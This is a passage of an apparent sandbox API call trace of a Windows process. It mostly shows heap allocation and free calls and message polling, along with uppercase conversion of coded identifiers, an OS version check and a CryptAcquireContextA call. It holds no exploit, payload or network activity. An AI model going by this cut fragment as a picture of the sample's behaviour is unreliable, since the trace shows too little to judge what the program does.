Flags=0x0, Size=0x10) returned 0x2aab218 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0223.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0223.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0223.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.061] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.061] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0223.061] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.061] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0223.062] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.062] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.062] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.062] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.062] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0223.062] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0223.063] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.063] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.063] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.064] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.064] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.064] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0223.064] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0223.064] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0223.064] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.064] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.064] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.065] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.065] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.065] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0223.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0223.065] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.065] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.065] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.065] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.065] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.065] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0223.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0223.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7100, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0223.066] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bc48) returned 1 [0223.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.067] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0223.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.067] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0223.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.067] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.067] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.068] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0223.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.068] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0223.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.068] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.068] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.068] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.068] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.068] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.068] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.068] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.068] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.068] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.069] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.069] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.069] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.069] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.069] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.069] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.069] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.069] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.069] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.069] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.069] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.069] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.069] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 